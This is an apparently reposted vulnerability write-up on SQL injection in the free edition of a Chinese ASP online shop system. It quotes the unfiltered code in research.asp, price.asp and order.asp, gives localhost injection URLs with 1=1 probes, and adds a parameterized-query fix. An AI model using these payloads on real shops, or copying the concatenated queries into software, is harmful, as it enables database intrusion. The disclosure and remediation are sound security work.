SQL injection vulnerabilities in 网趣网上购物系统旗舰版 (free edition)

Version: 网趣网上购物系统旗舰版 (free edition)

Download: http://www.cnhww.com/down.asp?id=6

----------------------------------------------------------------------

Spot 1:

/research.asp

selectname is not filtered at all, which gives a search-type (LIKE) injection.

code:

Lines 7-12:

    dim action,searchkey,anclassid,jiage,selectname
    anclassid=request("anclassid")
    searchkey=request("searchkey")
    jiage=request("jiage")
    action=request("action")
    selectname=request("selectname")    ' selectname is read here with no filtering at all

Lines 212-230:

    if anclassid<>0 then
        select case action
            case "1"
                sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
            case "2"
                sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
            case "3"
                sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and anclassid="&anclassid&" "
        end select
    else
        select case action
            case "1"
                sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
            case "2"
                sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "    ' this is the branch I used
            case "3"
                sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
        end select
    end if

Line 234:

    rs.open "select * from products where "&sql1&"  and zhuangtai=0 order by adddate desc",conn,1,1

Constructed request:

http://127.0.0.1:8080/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='

--------------------------------------------------------------------

Spot 2:

/price.asp

anid is not filtered at all, which gives a numeric injection.

code:

Line 74:

    anid=trim(request("anid"))    ' anid is read here with no filtering at all

Line 104:

    if anid<>"" then rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1

Constructed request:

http://127.0.0.1:8080/price.asp?anid=62 and 1=1

---------------------------------------------------------------------

Spot 3:

/order.asp

dan is not filtered at all, which gives a string-type injection.

code:

Line 64:

    dingdan=request.QueryString("dan")    ' dan is read here with no filtering at all

Line 66:

    rs.open "select products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liuyan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodizhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1

Constructed request:

Place an order first; otherwise it cannot be exploited.

http://127.0.0.1:8080/order.asp?dan=201277143453' and '1'='1
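As an added example (not code from 网趣网上购物系统 or from the original post), the three rs.open calls above rewritten so that every request value is bound as an ADODB.Command parameter instead of being concatenated into the SQL text; the open connection object conn, the column types and the string lengths are assumptions.

```vbscript
' Added example, not the shop system's own code. Assumes an open ADO connection "conn";
' column types (adDouble for prices) and string sizes are assumptions about the schema.
Const adCmdText = 1
Const adParamInput = 1
Const adInteger = 3
Const adDouble = 5
Const adVarWChar = 202

' Executes sqlText, binding each "?" in order to params(i) = Array(type, size, value).
' Returns the recordset produced by the query.
Function RunParamQuery(conn, sqlText, params)
    Dim cmd, i
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = sqlText
    cmd.CommandType = adCmdText
    For i = 0 To UBound(params)
        cmd.Parameters.Append cmd.CreateParameter("p" & i, params(i)(0), adParamInput, params(i)(1), params(i)(2))
    Next
    Set RunParamQuery = cmd.Execute
End Function

' research.asp, action=2 branch: the LIKE wildcards go into the parameter value, not the
' SQL text, so a quote inside selectname is data, not syntax (% and _ stay LIKE wildcards).
Dim selectname, jiage, rs1
selectname = request("selectname")
jiage = request("jiage")
If Not IsNumeric(jiage) Then jiage = 0
Set rs1 = RunParamQuery(conn, _
    "select * from products where pingpai like ? and (shichangjia<? or huiyuanjia<? or vipjia<?) and zhuangtai=0 order by adddate desc", _
    Array(Array(adVarWChar, 255, "%" & selectname & "%"), Array(adDouble, 0, CDbl(jiage)), _
          Array(adDouble, 0, CDbl(jiage)), Array(adDouble, 0, CDbl(jiage))))

' price.asp: anid must be numeric and is bound as an integer; "62 and 1=1" never reaches the query.
Dim anid, rs2
anid = Trim(request("anid"))
If anid <> "" And IsNumeric(anid) Then
    Set rs2 = RunParamQuery(conn, "select * from products where anclassid=? order by adddate desc", _
        Array(Array(adInteger, 0, CLng(anid))))
End If

' order.asp: the cookie username and dan are both bound as strings (column list shortened here).
Dim dingdan, rs3
dingdan = request.QueryString("dan")
Set rs3 = RunParamQuery(conn, _
    "select products.bookname, orders.dingdan from products inner join orders on products.bookid=orders.bookid where orders.username=? and dingdan=?", _
    Array(Array(adVarWChar, 50, request.cookies("Cnhww")("username")), Array(adVarWChar, 50, dingdan)))
```

cmd.Execute returns a forward-only, read-only recordset, which is sufficient for the listings these three pages render; with the values bound this way the payloads shown above are compared as literal data rather than executed as SQL.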

----------------------------------------------------------------------

Spot 4:

/my_msg.asp

delid is not filtered at all (I am using the free edition and could not test this, but the vulnerability very likely exists).

----------------------------------------------------------------------

Reposted from: http://www.90sec.org/thread-3089-1-1.html
